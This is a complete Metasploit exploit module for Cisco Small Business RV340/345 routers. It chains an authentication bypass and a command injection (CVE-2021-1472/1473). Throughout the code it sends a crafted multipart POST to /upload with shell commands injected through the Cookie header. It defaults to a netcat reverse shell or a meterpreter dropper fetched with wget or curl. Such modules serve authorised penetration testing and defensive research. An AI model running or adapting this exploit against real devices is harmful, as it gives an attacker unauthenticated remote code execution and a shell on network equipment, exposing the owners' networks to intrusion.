Cisco Small Business RV Series Authentication Bypass / Command Injection Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco Small Business RV Series Authentication Bypass and Command Injection',
        'Description' => %q{
          This module exploits an authentication bypass (CVE-2021-1472) and command injection (CVE-2021-1473)
          in the Cisco Small Business RV series of VPN/routers. The device does not adequately verify the
          credentials in the HTTP Authorization field when requests are made to the /upload endpoint. Then
          the upload.cgi binary will use the contents of the HTTP Cookie field as part of a `curl` request
          aimed at an internal endpoint. The curl request is executed using `popen` and allows the attacker
          to inject commands via the Cookie field.

          A remote and unauthenticated attacker using this module is able to achieve code execution as `www-data`.

          This module affects the RV340, RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and below.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Takeshi Shiomitsu', # Vulnerability discovery
          'jbaines-r7' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2021-1472' ],
          [ 'CVE', '2021-1473' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx'],
          [ 'URL', 'https://seclists.org/fulldisclosure/2021/Apr/39' ],
          [ 'URL', 'https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/' ]
        ],
        'DisclosureDate' => '2021-04-07',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => {
                'BadChars' => '\''
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'Payload' => {
                'BadChars' => '\''
              },
              'CmdStagerFlavor' => [ 'wget', 'curl' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'MeterpreterTryToFork' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Sends the exploit. Authentication bypass is successful as long as the authorization field
  # is present (we add a valid base64 value as well). Command injection occurs in the cookie
  # field. Otherwise, various values need to be present in the /upload to satisfy the upload
  # configuration logic. Randomized values to the best of our ability.
  # @return res
  def send_exploit(cmd)
    options = Rex::Text.rand_text_alphanumeric(5..12)
    destination = Rex::Text.rand_text_alphanumeric(5..12)
    filepath = Rex::Text.rand_text_alphanumeric(5..12)
    filename = Rex::Text.rand_text_alphanumeric(5..12)
    filexml = Rex::Text.rand_text_alphanumeric(5..12)
    uploadname = Rex::Text.rand_text_alphanumeric(5..12)
    auth = Rex::Text.encode_base64("#{Rex::Text.rand_text_alphanumeric(5..12)}:#{Rex::Text.rand_text_alphanumeric(5..12)}")

    multipart_form = Rex::MIME::Message.new
    multipart_form.add_part(options, nil, nil, 'form-data; name="option"')
    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
    multipart_form.add_part(filexml, 'application/xml', nil, 'form-data; name="file"; filename="config.xml"')
    multipart_form.add_part("#{filename}.xml", nil, nil, 'form-data; name="filename"')

    # this xml data required as is
    multipart_form.add_part('<input><fileType>configuration</fileType><source><location-url>' \
      'FILE://Configuration/config.xml</location-url></source><destination><config-type>' \
      'config-running</config-type></destination></input>', nil, nil, "form-data; name=\"#{uploadname}\"")

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/upload'),
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
      'headers' => {
        'Cookie' => "sessionid='`#{cmd}`'",
        'Authorization' => auth
      },
      'data' => multipart_form.to_s
    }, 10)
  end

  # The system doesn't have a good way to snag the version. This check attempts the exploit
  # with a command that returns immediately (id) and checks that the response looks like
  # how a vulnerable target would respond.
  def check
    res = send_exploit('id')
    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200

    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
    end

    CheckCode::Safe('The target did not respond with an expected payload.')
  end

  def execute_command(cmd, _opts = {})
    # parsing of the cookie field is thrown off by ;. Replacing with && works fine, but the only
    # downside is if the payload fails then it won't clean up after itself. Oddly, device's sh
    # required the spacing.
    cmd = cmd.gsub(/;/, ' && ')
    res = send_exploit(cmd)

    # unix command holds the connection open. Meterpreter should not. I think this logic is fine though.
    # If :unix_cmd gets a good check() value and then send_exploit returns with a nil response
    # then that is a clear sign that :unix_cmd was successful
    if target['Type'] != :unix_cmd
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
      body_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
    end

    print_good('Exploit successfully executed.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 120)
    end
  end
end